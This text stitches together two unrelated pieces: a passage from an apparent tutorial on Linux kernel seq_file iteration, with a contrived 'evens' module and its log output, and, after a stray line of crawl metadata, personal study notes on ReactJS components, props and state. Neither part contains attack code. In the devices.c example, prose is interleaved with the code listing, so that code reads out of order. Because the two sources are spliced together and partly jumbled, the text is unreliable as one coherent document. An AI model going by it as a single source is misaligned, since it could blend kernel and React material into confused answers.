void * (*start) (struct seq_file *m, loff_t *pos);
int (*show) (struct seq_file *m, void *v);
void * (*next) (struct seq_file *m, void *v, loff_t *pos);
void (*stop) (struct seq_file *m, void *v);
};
And what do each of these routines represent? Let's discuss them one at a time.
First, when you attempt to list the contents of the sequence file, the "start" routine that you define is automatically invoked to initialize the iteration loop. By default, the first time the start routine is called, the offset position passed to that routine is zero, which allows you to initialize pointers, allocate objects, or whatever it is you need to do to prepare to start printing. But that's not all.
If successful, the start routine is responsible for returning the address of the first "object" of many to be printed. This could be the first element in an array, the first object in a linked list, or whatever. But whatever it represents, that pointer must be set properly as it's the value that will be used for printing later.
Next, the purpose of your "show" routine should be self-evident--given a pointer to some object, the show routine is responsible for, well, "printing" it, using any of the sequence file output routines discussed in earlier columns. The only limitation here is that a single "show" operation can't print more than one page of output. And here's where the fun starts.
Your "next" routine is responsible for bumping up the iteration information of your sequence file in not just one but two ways. That routine must increment your position offset (typically by one), and it must also increment the void pointer to refer to the next data object to be printed. It might seem redundant to have two iterators keeping track of your progress, but you will need them both, for reasons that will be clear later.
In addition, your "next" routine is responsible for checking if you're finally out of objects to print, at which point it should return a NULL pointer to signify that there's nothing left to print.
Finally, the "stop" routine is invoked after all objects have been printed, and it's the responsibility of that routine to release any resources that were allocated initially by your "start" routine, and so on. All of this will become more obvious once we start working our way through the example. But there's one ugly detail we need to cover first.
What If I Want to Print LOTS of Data?
And here's a property of sequence files that seems to get little attention, so let's deal with it now. As I mentioned earlier, the major benefit of this "sequencing" of output is to beat the kernel page limit, so as long as any single output operation from your "show" routine is less than a page, you're fine. But that's not the whole story.
It turns out that, as you keep printing one object after another, your total output (one printed item after another) is still being checked against that page limit and, if you're about to exceed that limit, that's when things get exciting.
If your next "show" operation would cause the total amount of output printed thus far to exceed a page, the sequence file terminates printing, calls your "stop" routine, cleans up and then immediately restarts printing by re-invoking your "start" routine with the offset position of where things left off, which means that you need to design all of your routines with the understanding that this stopping and re-starting has to be absolutely seamless and invisible to the user. You'll see what I mean shortly once we get into the example.(Note: This feature--the potential stopping and restarting in the middle of printing--is why so many beginning programmers, when testing their first sequence file, complain that something must be going wrong as their "stop" routine seems to be called more than once. They don't realize that that is, in fact, normal behaviour, depending on the amount of output.)
So What's the Example Going to Do?
To demonstrate all of this, let's use a totally contrived example that does nothing but print even numbers, one number per "show" operation, as if this was a useful thing to do. In addition, let's throw in some dynamic memory allocation and allocate a single integer which will store the current value of the even number, even though that's a bit of overkill.
In addition, let's add a module parameter that lets us specify how far we want to print. And, on top of all that, let's throw in massive amounts of kernel debugging information to the /var/log/messages file so you can follow what happens as you enter and exit each routine.
The Example
Let's call our module source file evens.c, and away we go with header files and our module parameter:
#include <linux/moduleparam.h>
#include <linux/init.h>
#include <linux/kernel.h>
#include <linux/proc_fs.h>
#include <linux/fs.h>
#include <linux/seq_file.h>
#include <linux/slab.h> // for kmalloc()
static int limit = 10;
module_param(limit, int, S_IRUGO);
Next, let's declare a pointer to the integer we're going to dynamically allocate to store the current even number. As I said, this is a bit of a contrived example and you'd normally be "printing" more interesting objects, but this is enough to demonstrate the basic principles:
static int* even_ptr;
And now, one at a time, let's define our four essential routines.
The "start" Routine
static void *
ct_seq_start(struct seq_file *s, loff_t *pos)
{
printk(KERN_INFO "Entering start(), pos = %Ld.\n", *pos);
if ((*pos) >= limit) { // are we done?
printk(KERN_INFO "Apparently, we're done.\n");
return NULL;
}
// Allocate an integer to hold our increasing even value.
even_ptr = kmalloc(sizeof(int), GFP_KERNEL);
if (!even_ptr) // fatal kernel allocation error
return NULL;
printk(KERN_INFO "In start(), even_ptr = %pX.\n", even_ptr);
*even_ptr = (*pos) * 2;
return even_ptr;
}
So what can we say about the above? Plenty:
- This routine, and all of the others, will be printing all sorts of debugging information so you can keep up with what happens at each step.
- While we expect the first invocation of the start routine to begin with an offset position of zero, we need to allow for the fact that (as we mentioned above), this represents a restart somewhere in the middle of our sequence, so under no circumstances should you count on that value being zero, and you should always compare it to the terminating value to see if it's time to stop.
- If we just entered this routine, it's our responsibility to allocate whatever we might need (even if this is a restart). This suggests that, when we call the "stop" routine, it's our job to release all acquired resources, even it it means that we need to reacquire them all over again on a restart.
- Just for fun, print the address of the dynamically-allocated integer, because if we have to free and reacquire that space, it's easy to see that you might not get the same space the next time.
- Finally, based on whatever the value of that position offset is, you need to initialize your even number to the appropriate value. If this is a restart, it will be initialized to the value that represents where you need to pick up where you left off.
So far, so good? Moving on, then.
The "show" Routine
This routine is fairly straightforward--given the address of the "thing" you want to print, cast the pointer to the correct type, dereference it, then print it, based on whatever definition of "printing" you've decided on:
static int
ct_seq_show(struct seq_file *s, void *v)
{
printk(KERN_INFO "In show(), even = %d.\n", *((int*)v));
seq_printf(s, "The current value of the even number is %d\n",
*((int*)v));
return 0;
}
All of that looks fairly reasonable, except for the really verbose output message that represents the output of the sequence file. Normally, you'd simply print the value and move on. Instead, we were deliberately wordy simply because I want to print so much output that I do exceed that page limit of output at some point, so you can see what happens when that occurs.
The "next" Routine
This routine represents what has to be done to move on to the next object to print:
static void *
ct_seq_next(struct seq_file *s, void *v, loff_t *pos)
{
int* val_ptr;
printk(KERN_INFO "In next(), v = %pX, pos = %Ld.\n", v, *pos);
(*pos)++; // increase my position counter
if ((*pos) >= limit) // are we done?
return NULL;
val_ptr = (int *) v; // address of current even value
(*val_ptr) += 2; // increase it by two
return v;
}
Things to notice about the above:
- A major job of this routine is to detect when you have no data left to print, and return NULL when that happens.
- If you're not done, you have to bump up both the "offset" and the corresponding object pointer value, so that the next call to the "show" routine gets the correct value. Quite simply, it's your job to keep those two values in sync with one another.
The "stop" Routine
Finally, the job of your stop routine is to do any necessary cleanup and release of system resources that might have been allocated in your start routine, but make sure you keep the following in mind.
This might not be the end of all printing. Instead, as we explained above, your stop routine might have been invoked simply because you were about to exceed that page limit, at which point your sequence file is "stopped," then restarted with the current offset so that you can pick up where you left off.
In order to drive this home, we've added all sorts of debugging information so you can see clearly what your stop routine is doing:
static void
ct_seq_stop(struct seq_file *s, void *v)
{
printk(KERN_INFO "Entering stop().\n");
if (v) {
printk(KERN_INFO "v is %pX.\n", v);
} else {
printk(KERN_INFO "v is null.\n");
}
printk(KERN_INFO "In stop(), even_ptr = %pX.\n", even_ptr);
if (even_ptr) {
printk(KERN_INFO "Freeing and clearing even_ptr.\n");
kfree(even_ptr);
even_ptr = NULL;
} else {
printk(KERN_INFO "even_ptr is already null.\n");
}
}
The reason for all that output will become obvious shortly.
The Rest of the Module Source
Add this remaining code to your source file, and you're ready to go:
static struct seq_operations ct_seq_ops = {
.start = ct_seq_start,
.next = ct_seq_next,
.stop = ct_seq_stop,
.show = ct_seq_show
};
static int ct_open(struct inode *inode, struct file *file)
{
return seq_open(file, &ct_seq_ops);
};
static struct file_operations ct_file_ops = {
.owner = THIS_MODULE,
.open = ct_open,
.read = seq_read,
.llseek = seq_lseek,
.release = seq_release
};
static int
ct_init(void)
{
struct proc_dir_entry *entry;
entry = create_proc_entry("evens", 0, NULL);
if (entry)
entry->proc_fops = &ct_file_ops;
return 0;
}
static void
ct_exit(void)
{
remove_proc_entry("evens", NULL);
}
module_init(ct_init);
module_exit(ct_exit);
MODULE_LICENSE("GPL");
Your First Test Run
If you accept the default limit of just the first 10 even numbers, then build the module and load it, after which you should see a brand new file named /proc/evens. List that file to see the first 10 even numbers (starting with zero):
$ cat /proc/evens
The current value of the even number is 0
The current value of the even number is 2
The current value of the even number is 4
The current value of the even number is 6
The current value of the even number is 8
The current value of the even number is 10
The current value of the even number is 12
The current value of the even number is 14
The current value of the even number is 16
The current value of the even number is 18
That seemed to work fine, but it's the debugging output that went to /var/log/messages that's interesting and a bit puzzling:
Sep 6 15:11:34 localhost kernel: Entering start(), pos = 0.
Sep 6 15:11:34 localhost kernel: In start(), even_ptr = ffff88010b8bc6b8.
Sep 6 15:11:34 localhost kernel: In show(), even = 0.
Sep 6 15:11:34 localhost kernel: In next(), v = ffff88010b8bc6b8, pos = 0.
Sep 6 15:11:34 localhost kernel: In show(), even = 2.
Sep 6 15:11:34 localhost kernel: In next(), v = ffff88010b8bc6b8, pos = 1.
Sep 6 15:11:34 localhost kernel: In show(), even = 4.
... snip ...
Sep 6 15:11:34 localhost kernel: In next(), v = ffff88010b8bc6b8, pos = 8.
Sep 6 15:11:34 localhost kernel: In show(), even = 18.
Sep 6 15:11:34 localhost kernel: In next(), v = ffff88010b8bc6b8, pos = 9.
Sep 6 15:11:34 localhost kernel: Entering stop().
Sep 6 15:11:34 localhost kernel: v is null.
Sep 6 15:11:34 localhost kernel: In stop(), even_ptr = ffff88010b8bc6b8.
Sep 6 15:11:34 localhost kernel: Freeing and clearing even_ptr.
... hang on, why are we starting over here? ...
Sep 6 15:11:34 localhost kernel: Entering start(), pos = 10.
Sep 6 15:11:34 localhost kernel: Apparently, we're done.
Sep 6 15:11:34 localhost kernel: Entering stop().
Sep 6 15:11:34 localhost kernel: v is null.
Sep 6 15:11:34 localhost kernel: In stop(), even_ptr = (null).
Sep 6 15:11:34 localhost kernel: even_ptr is already null.
So what do we notice about the above, one step at a time:
- Unsurprisingly, the first invocation of your start routine is passed an initial offset of zero.
- The address of the dynamically-allocated integer to store my current even value is, on this 64-bit system, ffff88010b8bc6b8, which I'll need to deallocate later when I'm done.
- I can see the position offset and the even value increasing correspondingly, until the "next" routine finally notices that we've reached the end, at which point the "stop" routine is called.
- The stop routine checks that the variable even_ptr still has a non-zero value, at which point that storage is freed and the pointer is set to NULL for a reason that will become clear shortly.
And this is where things get a bit strange since, if you look closely at the above debugging output, even though we've printed all 10 of our desired even numbers and are officially finished, the implementation of sequence files still calls the "start" routine a second time with the position offset of 10, and it's the job of the start routine to notice that there's nothing left to do and immediately return NULL.
Not only that, but it should be obvious that because you're invoking the start routine a second time, you will be invoking your stop routine a second time as well, so you have to be careful that you don't try to free that same dynamically-allocated space again. It may be that this is the expected behaviour, but I have to admit I was a bit surprised to see this happening, so make sure you take this into account and be very careful with any kernel-space dynamic allocation.
Note: If you don't need to do any dynamic allocation, and that pointer represents simply the address of each existing data object in turn, then the above won't have any effect. But the above was simply to warn you about the subtle errors that might creep into your sequence files if you don't know about this.
And What If There's LOTS of Output?Finally, let's see what happens if you unload that module, then reload it with a much larger limit of, say, 1000:
# insmod evens.ko limit=1000This is what you might see in /var/log/messages as you list the contents of that proc file:
... things start off just as before ...
Sep 6 15:25:10 localhost kernel: Entering start(), pos = 0.
Sep 6 15:25:10 localhost kernel: In start(), even_ptr = ffff88010b8bc6d0.
Sep 6 15:25:10 localhost kernel: In show(), even = 0.
Sep 6 15:25:10 localhost kernel: In next(), v = ffff88010b8bc6d0, pos = 0.
Sep 6 15:25:10 localhost kernel: In show(), even = 2.
Sep 6 15:25:10 localhost kernel: In next(), v = ffff88010b8bc6d0, pos = 1.
Sep 6 15:25:10 localhost kernel: In show(), even = 4.
... much later, about to hit a kernel page limit,
so we stop printing and invoke the stop() routine ...
Sep 6 15:25:10 localhost kernel: In show(), even = 188.
Sep 6 15:25:10 localhost kernel: Entering stop().
Sep 6 15:25:10 localhost kernel: v is ffff88010b8bc6d0.
Sep 6 15:25:10 localhost kernel: In stop(), even_ptr = ffff88010b8bc6d0.
Sep 6 15:25:10 localhost kernel: Freeing and clearing even_ptr.
... only to invoke start() again, and pick up where we left off ...
Sep 6 15:25:10 localhost kernel: Entering start(), pos = 94.
Sep 6 15:25:10 localhost kernel: In start(), even_ptr = ffff88010b8bc6d0.
Sep 6 15:25:10 localhost kernel: In show(), even = 188.
Sep 6 15:25:10 localhost kernel: In next(), v = ffff88010b8bc6d0, pos = 94.
... much more output snipped ...
Notice what happened there? Apparently, after printing a certain amount of output, your sequence file realized that it was about to exceed the kernel page limit in terms of total output, at which point it called things off, put a stop to printing and invoked your "stop" routine to shut everything down. After which, of course, it turned around, re-invoked your "start" routine with the position offset where it left off and picked things up again.
It just so happens that the next memory allocation call grabbed the same location that had just been freed, but there's no guarantee of that--it could have been a different address entirely.
And, as it did before, even when your sequence file hit the specified limit and was truly done printing all 1000 values, it insisted on restarting only to notice that, yes, this time it was really finished:
Sep 6 15:25:10 localhost kernel: In show(), even = 1996.
Sep 6 15:25:10 localhost kernel: In next(), v = ffff88010b8bc6d0, pos = 998.
Sep 6 15:25:10 localhost kernel: In show(), even = 1998.
Sep 6 15:25:10 localhost kernel: In next(), v = ffff88010b8bc6d0, pos = 999.
... we're really and truly done now ...
Sep 6 15:25:10 localhost kernel: Entering stop().
Sep 6 15:25:10 localhost kernel: v is null.
Sep 6 15:25:10 localhost kernel: In stop(), even_ptr = ffff88010b8bc6d0.
Sep 6 15:25:10 localhost kernel: Freeing and clearing even_ptr.
... once again, restart only to notice nothing left to do ...
Sep 6 15:25:10 localhost kernel: Entering start(), pos = 1000.
Sep 6 15:25:10 localhost kernel: Apparently, we're done.
Sep 6 15:25:10 localhost kernel: Entering stop().
Sep 6 15:25:10 localhost kernel: v is null.
Sep 6 15:25:10 localhost kernel: In stop(), even_ptr = (null).
Sep 6 15:25:10 localhost kernel: even_ptr is already null.
Is It Always That Complicated?
Not necessarily. Note that I deliberately made this example more complicated than it had to be by dynamically allocating a single data pointer for no good reason, at which point I had to look after it constantly.
It may be that your sequence file is printing the entries in an array, and that the position offset very quickly gives you the address of the appropriate array element, so that there's no need for dynamic allocation anywhere. That's not uncommon, and it would obviously simplify your code. In cases like that, where the object pointer can be calculated directly from the position offset value, your start and stop code should be trivial.
Is There More?
Sure, why not. While we're here, let's beat this to death. First, notice that you're effectively responsible for keeping track of two "iterators"--the position offset (which starts off at zero and typically is incremented by one each time, identifying which object you're printing), and the "void *" object pointer, which is used to keep track of each object that you print.
While it might seem odd to need to handle two iterators, notice that you absolutely must keep them synchronized and up to date. The object pointer is necessary for the "show" routine to know which object to print, while the position offset value is critically important in case your sequence file needs to stop and restart in the midst of printing, since that's the only value that tells your start routine where to resume. Without that value, your sequence file simply won't work properly.
Another subtle but important point involves the "void *" pointer that is passed to your stop routine. If you examine both examples above, you'll notice that while that value seems to persist over stops and restarts, when your stop routine is called for the final time, that value appears to always be NULL. That means that you cannot use that pointer to store the result of a dynamic allocation since, by the time you get to your final call to your stop routine, you've lost that value. (One suspects that that "feature" is the reason a number of sequence files don't work properly at termination time.)
An additional point involves something you saw above--that even after your "next" routine detected that you were done and invoked your "stop" routine, you still ended up calling your "start" routine one more time, which immediately noticed that you were done, which then immediately invoked your "stop" routine yet again. This is a common source of sequence file errors, when someone deallocates some storage in their "stop" routine but doesn't clear the pointer, then tries to deallocate that very same storage a second time. That's why we insisted on setting the even_ptr pointer to NULL after the deallocation in your "stop" routine--to ensure that we didn't try to erroneously free it a second time.
And here's one final bit of information you might have some fun with. Note that most of your routines above accept, as a first argument, the pointer to the sequence file structure in question:
struct seq_operations {
void * (*start) (struct seq_file *m, loff_t *pos);
int (*show) (struct seq_file *m, void *v);
void * (*next) (struct seq_file *m, void *v, loff_t *pos);
void (*stop) (struct seq_file *m, void *v);
};
Not surprisingly, we ignore that struct seq_file* pointer for the most part, but if you're interested in seeing what's going on behind the scenes, you can examine the definition of that structure in the kernel header file include/linux/seq_file.h:
struct seq_file {
char *buf;
size_t size;
size_t from;
size_t count;
loff_t index;
loff_t read_pos;
u64 version;
struct mutex lock;
const struct seq_operations *op;
void *private;
};
Note how, if you're interested, you can examine various fields in that structure at any time, such as the size of the buffer and how full it is at any time. There's even a private pointer of type "void *" you're welcome to use if you want to store some data of that type -- perhaps a reasonable place to keep track of some dynamically-allocated data. If you're feeling ambitious, extend the example shown above by printing even more debugging information as each routine is called.
Some Real-Life Examples
If you want to examine some actual sequence files in the current kernel source tree, take a look at some of the source files under fs/proc. As one example, peruse the source in the file devices.c, which is the implementation of the /proc/devices file:
$ cat /proc/devices
Character devices:
1 mem [0, 256]
4 /dev/vc/0 [0, 1]
4 tty [1, 63]
4 ttyS [64, 32]
5 /dev/tty [0, 1]
... etc etc ...
What's interesting about that example is that, if you examine the "start" and "next" routines for that sequence file:
static void *devinfo_start(struct seq_file *f, loff_t *pos)you'll notice that the position offset value is being used simultaneously as the object address pointer value being returned. All this represents is an implementation that is so trivial and straightforward that that same value can do double-duty--not at all uncommon depending on what you're trying to do.
{
if (*pos < (BLKDEV_MAJOR_HASH_SIZE + CHRDEV_MAJOR_HASH_SIZE))
return pos;
return NULL;
}
static void *devinfo_next(struct seq_file *f, void *v, loff_t *pos)
{
(*pos)++;
if (*pos >= (BLKDEV_MAJOR_HASH_SIZE + CHRDEV_MAJOR_HASH_SIZE))
return NULL;
return pos;
}
So Is All of This Correct?
That's a good question. As I admitted up-front, I'm fairly sure I've got the semantics right, but I'm willing to be corrected, so test the above and leave observations in the comments section. And check back a few times since I might tweak this piece based on any feedback. | https://www.linux.com/learn/linux-career-center/44184-the-kernel-newbie-corner-kernel-debugging-with-proc-qsequenceq-files-part-3 | CC-MAIN-2014-23 | refinedweb | 4,613 | 58.11 |
I am trying to work on Audio file and have seconds as
int in C#, but I would like to convert seconds into hh:mm:ss ( hours, minutes and seconds) format, so How can I do it easily in C#?
For example: 20 Seconds = 00:00:20 in hour,minutes,seconds format.
If you are using .NET 4.0 or above, you can simply convert seconds into TimeSpan and then get hours:minutes:seconds
TimeSpan time = TimeSpan.FromSeconds(seconds); // backslash is used to ":" colon formatting you will not see it in output string str = time.ToString(@"hh\:mm\:ss");
Here is the sample Program
using System; public class Program { public static void Main() { TimeSpan time = TimeSpan.FromSeconds(890); // backslash is used to ":" colon formatting you will not see it in output string str = time .ToString(@"hh\:mm\:ss"); Console.WriteLine(str); } }
Output:
00:14:50
You can try it on .NET fiddle:
If you want to add "miliseconds" also, then use below format
string str = time.ToString(@"hh\:mm\:ss\:fff");
Subscribe to our weekly Newsletter & Keep getting latest article/questions in your inbox weekly | https://qawithexperts.com/questions/484/how-to-convert-seconds-into-hhmmss-in-c | CC-MAIN-2021-39 | refinedweb | 185 | 64.2 |
repoze.bitblt 0.9
Image transforming WSGI middleware
This package provides a WSGI middleware component which automatically scales images according to the width and height property in the <img> tag.
To configure the middleware, pass in a string for secret; this may be any string internal to the system.
You can also set filter to select the scaling filter. The available filters are nearest, bilinear, bicubic and antialias. The default is antialias.
If you want to change the compression level for JPEG images, then you can set the quality option to a value between 1 (worst) and 95 (best). The default is 80.
By default all image URLs are rewritten. With limit_to_application_url you can limit the rewriting to relative URLs and absolute URLs below the application URL.
A minimal cache implementation is available with the cache parameter. It should be the path to a directory where generated images will be saved. This is a very simplistic approach that does not use any possibly related HTTP header at all: Last-Modified, Expires, etc. The only way to refresh or empty the cache is to delete the files. This feature is disabled by default.
Usage
The middleware operates in two phases, on HTML documents and images respectively.
When processing HTML documents, it looks for image tags in the document soup:
<img src="some_image.png" width="640" height="480" />
In the case it finds such an image element, it rewrites the URL to include scaling information which the middleware will read when the image is served through it.
The image will be proportionally scaled, so it fits into the given size. If you only set one of width or height, then the image will only be limited to that, but still proportionally scaled.
This effectively means that application developers needn’t worry about image scaling; simply put the desired size in the HTML document.
Note that this middleware is protected from DoS attacks (which is important for any middleware that does significant processing) by signing all URLs with an SHA digest signature.
Contributing
The development of repoze.bitblt happens at github:
Credits
- Malthe Borch <mborch@gmail.com>
- Stefan Eletzhofer <stefan.eletzhofer@inquant.de>
- Jeroen Vloothuis <jeroen.vloothuis@xs4all.nl>
- Florian Schulze <florian.schulze@gmx.net>
Changelog
0.9 (released 2012-10-18)
- Maintain embedded ICC Profiles in images. Requires PIL 1.1.7 or later.
- Add simplistic cache implementation. [damien]
- Remove paragraph in readme which mentions the try_xhtml option. It’s now a no-op. [jinty]
- Use PATH_INFO directly to avoid blowing up on non UTF-8 paths.
0.8 (released 2010-03-01)
The major change in the 0.8 release was a rewrite of the <img> tag search and replace to use regexs rather than lxml. It was proving too hard to prevent lxml from mangling low quality HTML in nasty ways. The new regex based search/replace takes a lot of care to only modify what is necessary.
Side effects of this change are a reduction of dependencies and theoretically better performance.
- Work with unclosed <img> tags (HTML4). [jinty]
- Re-write rewrite_image_tags to use regular expressions to find/mangle img tags. As well aas removing the dependency on lxml this prevents a whole class of bugs where lxml was changing the HTML source too much, see. Backwards compatibility for the ‘ImageTransformationMiddleware’ class was preserved by leaving the try_xhtml argument in place. It is now a no-op. [jinty]
- Make sure resizing preserves GIF transparency. [jinty]
- Fix bug where <![CDATA[ escaped sections would be quoted and the CDATA stripped. This causes foulups when quoting Javascript. [jinty]
- Properly rewrite <img> tags with pixel (e.g. height=”100px”) attributes, previously the url generated missed the regex resulting in broken images. [jinty]
- Don’t rewrite <img> tags with percentage sizes, only the browser knows how big the images should be. See. [jinty]
- Use unicode_body all over to ensure correct encoding. [jinty]
- Fixed bug where the leading slash of an absolute URL without the FQDN would be wrongly removed. [damien]
- Fixed bug where the quality-parameter would not be coerced to integer, required by PIL. [damien]
- Compatibility with Python 2.4. [malthe]
0.7 (released 2009-03-18)
- Don’t use python 2.6 syntax. [seletz]
- Handle empty content bodies, which can occure for redirects. [fschulze]
- Added support for xhtml, which allows the inclusion of namespace tags. [fschulze]
- Added option to limit the url rewriting to urls below the application url. [fschulze]
- Added scaling filter support. [fschulze]
- Support image tags with only one of the width or height attributes set. [fschulze]
- Fix UnboundLocalError for respones with untransformed image. [fschulze]
- Fix importing of PIL. The old way assumed the broken egg installation. [fschulze]
- Made tests run. [fschulze]
0.6 (released 2008-10-11)
- Require to pass in a secret parameter to configure middleware security. [malthe]
0.5 (released 2008-10-11)
- Rewritten URLs are now signed by the middleware to ensure that bitblt requests are only crafted by the middleware. This is required to shield against DoS attacks. [malthe]
0.4 (released 2008-10-11)
- Fixed path handling. [malthe]
- Added HTML document processing which scans document for image tags and rewrite image src attribute to include “bitblt” traversing directive. This makes it work as an actual middleware, since the application semantics are then unchanged. [malthe]
- No longer accept query parameters, but instead require traversing directive “/bitblt-<width>x<height>”. [malthe]
- Removed functionality to MIME-type convert. [malthe]
0.3 (released 2008-10-10)
- Made logic robust to unexpected parameters. [malthe]
- Fixed bug where parameters would be drawn from the WSGI environment. [malthe]
- Added mimetype conversion. [malthe]
0.2 (released 2008-10-08)
- Fixed entry point name.
0.1 (released 2008-10-03)
- Initial release.
- Author: Malthe Borch
- Keywords: web middleware wsgi pil image transformation
- License: BSD-derived ()
- Categories
- Package Index Owner: seletz, malthe, jinty
- DOAP record: repoze.bitblt-0.9.xml | https://pypi.python.org/pypi/repoze.bitblt | CC-MAIN-2017-04 | refinedweb | 975 | 59.9 |
Orbs Introduction
CircleCI Orbs are shareable packages of configuration elements, including jobs, commands, and executors. CircleCI provides certified orbs, along with 3rd-party orbs authored by CircleCI partners. It is best practice to first evaluate whether any of these existing orbs will help you in your configuration workflow. Refer to the CircleCI Orbs Registry for the complete list of certified orbs.
Importing an Existing Orb
To import an existing orb, add a single line to to your version 2.1 .circleci/config.yml file for each orb, for example:
version: 2.1 orbs: slack: circleci/slack@0.1.0 heroku: circleci/heroku@0.0.1
In the above example, two orbs are imported into your config, the Slack orb and the Heroku orb.
Note: If your project was added to CircleCI prior to 2.1, you must enable Build Processing to use the
orbs key.
Authoring Your Own Orb
If you find that there are no existing orbs that meet your needs, you may author your own orb to meet your specific environment or configuration requirements by using the CircleCI CLI as shown in the
circleci orb help output below. Although this is more time-consuming than using the import feature, authoring your own orb enables you to create a world-readable orb for sharing your configuration. See Creating Orbs for more information.
$ circleci orb help Operate on orbs Usage: circleci orb [command] Available Commands: create Create an orb in the specified namespace list List orbs process Validate an orb and print its form after all pre-registration processing publish Publish an orb to the registry source Show the source of an orb validate Validate an orb.yml
Note When authoring an orb, you will agree to CircleCI’s Code Sharing Terms of Service when your organization opts-in to 3rd party orb use and authoring. CircleCI thereby licenses all orbs back to users under the MIT License agreement.
Importing Partner Orbs
Import the following Partner Orbs by using the
orbs key in your
.circleci.yml/config.yml file and replacing
<orb reference string> with one from the table.
version: 2.1 orbs: <orb reference string>
Note: As a prerequisite, you must enable use of 3rd-party orbs on the Settings > Security page for your org.
See Also
- Refer to Using Orbs, for more about how to use existing orbs.
- Refer to Creating Orbs, where you will find step-by-step instructions on how to create your own orb.
- Refer to. | https://circleci.com/docs/2.0/orb-intro/ | CC-MAIN-2019-13 | refinedweb | 411 | 53.71 |
ReactJS Notes
Page Contents
Course Notes
These are notes from the Udemy course React - The Complete Guide by Maximilian Schwarzmüller. It's a great course, give it a go!
Intro
react react-dom babel - translate next gen javascript to browser compatible javascript react component is just a function that has to return the code to render to the dom JSX - needs babel as the preprocessor that converts JSX to normal javascript code JSX - requires one root div! function Person(props) { // React auto gives me the props parameter - the component properties. return ( <div className="person"> // NOTE: use of className not class! This is JSX thing - class is a reserved word in JS so cant be used. <h1>{props.name}</h1> <p>Some stuff: {stuff}</p> </div> ); } ReactDOM.render(<Person name="John" stuff="Whatever"/>, document.querySelector('#p1')); - render a javascript function as a component to the real dom inside div with id "p1" Could also do app = ( <div> <Person name="John" stuff="blah"/> <Person name="Peter" stuff="blah"/> </div> ); ReactDOM.render(app, document.querySelector('#app')); # A single page application React focusus on the what not the how - focus on what you want to see rather than managing individual UI state and keeping track of it all.
Todo / To Read / Good Reads.
Some Resources
create-react-app: Introducing JSX: Rendering Elements: Components & Props: Listenable Events:
Setup Local React Project
Build a workflow - optimize code, lint, make code cross-browser compatible using babel and jsx etc. Need - dependency management tool, e.g. npm bundler - put all our JS modules into one file - use webpack compiler - next-gen JS to older-JS = babel + presets dev server to test on ^^^^ There is a react-team supported tool that does all this for us! -- `npm install -g create-react-app` - only using nodeJS for the package manager and the dev server Use command create-react-app react-complete-guide --scripts-version 1.1.5 Creates a folder called `react-complete-guide` in the CWD CD into `react-complete-guide` and type `npm start` to start the development server. It server watches your files so if you change code it will auto-reload it for you!! tip: Try out `Rescripts`, which is used to modify create-react-app's webpack configuration, without ejecting the app... woop woop! ()
React Component Basics
Every component needs a `render()` method - it returns an object that react can use to render content to the HTML DOM. > Components are the core building block of React apps. Actually, React > really is just a library for creating components in its core. > A typical React app therefore could be depicted as a component tree - > having one root component ("App") and then an potentially infinite amount > of nested child components. > Each component needs to return/ render some JSX code - it defines > which HTML code React should render to the real DOM in the end. JSX v.s. React -------------- JSX is a syntactic sugar that needs to be translated into javascript code. For example "<div></div>" would be translated into React.createElement('div', props-object, child1 [,child2[,...]]), where the children are also created using React.createElement(...). JSX restrictions 1. Cannot use JS reserved keywords 2. Must have ONE root element, normally a DIV. - The way round this is to use a HOC that just returns its children. - In react > 16.2 you dont have to create this HOC yourself - its is provided and is called "React.Fragment". Creating Basic Components ------------------------- Directory and file(s) in that directory for each component with same name as componenet, normally using capitalised first letter. In file - import React from 'react.js'; - const component_name = (...) => { return SOME-REACT-ELMENTS-VIA-JSX; } - export default component_name; In root component file: - import Component_name from './Comonent_name/Component_name.js' <- Name must have upper-case character because elements starting lower case are reserved for HTML reserved node names - then use <Component_name>...</Componeent_name> To get JSX code to execute and use the output of a JS function (can only use one-line expressions), wrap the code in curley braces - {} Props ----- Allow us to pass attributes (and children) specified in the JSX/HTML code to the JS component so that it can display content dynamically. Note the props object passed to the componenet should *NOT* be modified by the component. If component is constructed using a function, the function gets one parameter - the props obejct. const componenet_name = (props) => { return <div> <p>I am {props.age} years old.</p> <p>I live in the country {props.country}</p> </div>; }; If componeent is constructed using a class then in the render() method use `this.props.age` for example. The props are passed automatically made available as `this.props` for you. To access children, e.g. <Component_name>Some text in the middle</Component_name>, use `props.children`, which is created by react for us. It will contain all elements between the opening and closing tags of the component, plain text, or an element tree... You can pass METHODS as props so that other componenets can access methods, from say, the main app, for example. This could allow a child componenet to change data in the parent component. It is a useful pattern. !!!! Whether you declare a component as a function or a class, it must never modify its own props. !!!! State ----- Only for classes exending `Component` (and see also React hooks for function based components) PRE React 16.8. Function based components can, since React 16.8, use the useState() hook Create a class variable named `state`, which should be a JS oject with keys, as you want to define them, mapping to values of interest. The variable is SPECIAL because if it changes it will triger React to re-render the DOM with the updated data BUT ONLY IF YOU USE `this.setState()`. !! NOTE you must use `this.setState()` to TRIGGER RE-RENDERING OF DOM !! Do not modify the state variable directly !! setState() takes an object as argument and merges it with the class state object for us. !! NOTE THE FOLLOWING !! !! !! It does not immediately trigger the render, it merely schedules a render, so the state won't be !! updated until React determines it is a "good time" to do that. !! !! Because of this, "this.state" in "setState()" is NOT GUARANTEED TO BE THE LASTEST/NEWEST !! STATE OF THE OBJECT!!!! It could be an older state. This is because React may batch multiple !! setState() calls into a single update for performance. !! !! See: !! See rationale for async setState: !! !! This means using setState like this can sometimes cause problems: !! someFunc = () => { !! setState({something: this.state.something + 1}); !! // ^^^^^^^^^^ !! // WARNING - this could be a STALE STATE !! }; !! !! The correct way to do this is as follows: !! someFunc = () => { !! setState((prevState, props) => { !! return { !! something: prevState.something + 1; !! }; !! }); !! }; !! !! This uses the alternative setState syntax which accepts a function that receives the previous !! state and the component's props. React can then call this function when it is ready to set !! a new state. Then prevState that is passed to this function is GUARANTEED BY REACT TO BE THE !! MOST RECENT STATE THAT YOU WOULD NORMALLY EXPECT. Generally on PROPS and STATE cause react to re-render the DOM. Anything using state is a statefull componenet. Otherwise it is stateless. Design to have few as possible statefull and as many as possible stateless (presentation) components. !!!! YOU SHOULD NEVER MUTATE THE STATE VARIABLE - ALWAYS TAKE COPIES, ESP FOR ARRAYS ETC, AND THE CALL setState() !!!! The same is true if the member is an object - you'd get a reference, not a copy of the object. Take a copy using: const objectmemberRef = {...this.state.objectReference }; OR old-school using Object.assign().
Events & Handlers
